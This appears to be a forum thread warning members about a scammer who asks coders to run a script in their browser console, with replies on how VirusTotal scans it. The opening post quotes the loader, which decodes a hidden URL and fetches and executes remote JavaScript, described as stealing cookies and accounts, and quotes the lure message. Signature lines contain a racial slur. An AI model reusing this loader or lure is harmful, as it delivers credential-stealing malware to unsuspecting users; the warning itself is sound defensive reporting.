Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   496

Exposing Scammer sending malware on c.sh UPDATED

by egooner - 10 August, 2025 - 03:39 AM
This post is by a banned member (egooner) - Unhide
egooner  
Registered
48
Posts
40
Threads
#1
(This post was last modified: 10 August, 2025 - 09:23 PM by egooner. Edited 1 time in total. Edit Reason: Updated admins give us updates on sb )
If you receive a message saying:

"Hey bro, I see you offer coding services.  
I need a bot or script to automate this exploit [link]. Do **not** execute it yet; I will explain everything."

Here’s what’s happening:

They want you to run a script inside your browser console. I’m adding stars here to avoid getting banned:

(() => {
  let node = 'https://swapzone.io/exchange/nodes/changenow/aHR0c******9maWxlcy5jYXRib3gubW9lLzQ0aHNucS5qcw/btc/node-1.9.js'.match(/changenow\/(.*?)\//)[1];
  fetch(atob(node)).then(r => r.text()).then(c => Function©());
})();

This is an example of the script they want you to run. I decoded it and found out it leads to this:

https://ibb.co/twY5SxmH

It turns out the script is malware that steals cookies, user accounts, and performs cryptocurrency fraud.

I downloaded the `.js` file and uploaded it to VirusTotal. Here’s what VirusTotal reported about it:

UPDATE PROOF TELEGRAM
https://ibb.co/DgWKF77H
Report Lucas Leaks – Telegram on telegram
VirusTotal - URL

Hope this helps, beware this guy making alts ignore and report it

This is a bump
This post is by a banned member (Martinito) - Unhide
Martinito  
Registered
302
Posts
18
Threads
2 Years of service
#2
yes, he sent me the same thing, he keeps recreating accounts and sending.
This post is by a banned member (Kermode) - Unhide
Kermode  
Supreme
1.105
Posts
862
Threads
#3
VT scanned the domain of the url and not the actual file
Cheapest OPENUPS in the market!

[Image: Comp-2.gif]
03.18.2026 - @nigger13[/align]
This post is by a banned member (egooner) - Unhide
egooner  
Registered
48
Posts
40
Threads
#4
(10 August, 2025 - 01:26 PM)Kermode Wrote: Show More
VT scanned the domain of the url and not the actual file

scan the file but says its clean i dont think it looks into the code
[Image: CynHfej.png]
This post is by a banned member (Kermode) - Unhide
Kermode  
Supreme
1.105
Posts
862
Threads
#5
(10 August, 2025 - 02:22 PM)egooner Wrote: Show More
(10 August, 2025 - 01:26 PM)Kermode Wrote: Show More
VT scanned the domain of the url and not the actual file

scan the file but says its clean i dont think it looks into the code

It only analyses statically, so you are right it wont fully catch everything especially if it's obfuscated javascript
Cheapest OPENUPS in the market!

[Image: Comp-2.gif]
03.18.2026 - @nigger13[/align]
This post is by a banned member (Alex) - Unhide
Alex  
Staff
3.474
Posts
109
Threads
Staff Team
6 Years of service
#6
We're aware of this malware, hopefully will be reduced or eliminated soon.
Cheapest OPENUPS in the market!

[Image: Comp-2.gif]
Paid Ad by @nigger13 | Ends in 19/02

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)